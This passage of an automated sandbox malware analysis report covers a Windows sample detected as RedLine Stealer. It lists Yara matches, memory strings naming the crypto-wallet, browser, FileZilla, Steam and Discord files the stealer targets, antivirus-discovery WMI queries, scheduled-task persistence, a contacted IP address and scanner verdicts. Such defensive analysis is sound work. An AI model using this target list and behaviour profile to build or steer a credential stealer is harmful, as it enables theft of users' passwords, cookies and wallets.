                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: VzwumYUBCtHW.exe, 0000000E.00000002.1945242568.00000000010AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.PzPxqbK89H.exe.4429990.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PzPxqbK89H.exe.44417b0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.PzPxqbK89H.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PzPxqbK89H.exe.44417b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PzPxqbK89H.exe.4429990.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1852775937.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1735860178.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PzPxqbK89H.exe PID: 7260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PzPxqbK89H.exe PID: 7792, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: VzwumYUBCtHW.exe PID: 7932, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: VzwumYUBCtHW.exe PID: 3548, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: PzPxqbK89H.exe, 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: PzPxqbK89H.exe, 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: PzPxqbK89H.exe, 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                    Source: PzPxqbK89H.exe, 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                    Source: PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: Yara matchFile source: 0.2.PzPxqbK89H.exe.4429990.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PzPxqbK89H.exe.44417b0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.PzPxqbK89H.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PzPxqbK89H.exe.44417b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PzPxqbK89H.exe.4429990.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1852775937.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1735860178.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PzPxqbK89H.exe PID: 7260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PzPxqbK89H.exe PID: 7792, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: VzwumYUBCtHW.exe PID: 7932, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: VzwumYUBCtHW.exe PID: 3548, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.PzPxqbK89H.exe.4429990.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PzPxqbK89H.exe.44417b0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.PzPxqbK89H.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PzPxqbK89H.exe.44417b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PzPxqbK89H.exe.4429990.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1852775937.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1735860178.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PzPxqbK89H.exe PID: 7260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PzPxqbK89H.exe PID: 7792, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: VzwumYUBCtHW.exe PID: 7932, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: VzwumYUBCtHW.exe PID: 3548, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		111
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		331
                    Security Software Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol3
                    Data from Local System                    		11
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		241
                    Virtualization/Sandbox Evasion                    		Security Account Manager241
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture12
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                    Software Packing                    		Cached Domain Credentials113
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502194 Sample: PzPxqbK89H.exe Startdate: 31/08/2024 Architecture: WINDOWS Score: 100 50 api.ip.sb 2->50 54 Multi AV Scanner detection for domain / URL 2->54 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 13 other signatures 2->60 8 PzPxqbK89H.exe 7 2->8         started        12 VzwumYUBCtHW.exe 2->12         started        signatures3 process4 file5 42 C:\Users\user\AppData\...\VzwumYUBCtHW.exe, PE32 8->42 dropped 44 C:\Users\...\VzwumYUBCtHW.exe:Zone.Identifier, ASCII 8->44 dropped 46 C:\Users\user\AppData\Local\...\tmpBC1E.tmp, XML 8->46 dropped 48 C:\Users\user\AppData\...\PzPxqbK89H.exe.log, ASCII 8->48 dropped 62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->62 64 Found many strings related to Crypto-Wallets (likely being stolen) 8->64 66 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 8->66 70 3 other signatures 8->70 14 PzPxqbK89H.exe 15 49 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        68 Multi AV Scanner detection for dropped file 12->68 24 VzwumYUBCtHW.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 45.137.22.239, 49737, 49739, 49741 ROOTLAYERNETNL Netherlands 14->52 72 Found many strings related to Crypto-Wallets (likely being stolen) 14->72 74 Tries to steal Crypto Currency Wallets 14->74 28 conhost.exe 14->28         started        76 Loading BitLocker PowerShell Module 18->76 30 conhost.exe 18->30         started        32 WmiPrvSE.exe 18->32         started        34 conhost.exe 20->34         started        36 conhost.exe 22->36         started        78 Tries to harvest and steal browser information (history, passwords, etc) 24->78 38 conhost.exe 24->38         started        40 conhost.exe 26->40         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    PzPxqbK89H.exe61%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                    PzPxqbK89H.exe61%VirustotalBrowse
                    PzPxqbK89H.exe100%AviraTR/Dropper.MSIL.Gen
                    PzPxqbK89H.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe61%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                    C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe61%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    api.ip.sb0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    http://www.fontbureau.com/designersG0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    http://www.fontbureau.com/designers/?0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%URL Reputationsafe
                    http://www.fontbureau.com/designers?0%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettings0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    http://www.fontbureau.com/designers0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdateResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnvironment0%URL Reputationsafe
                    https://api.ip.sb/geoip0%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://tempuri.org/Endpoint/GetUpdates0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://tempuri.org/0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
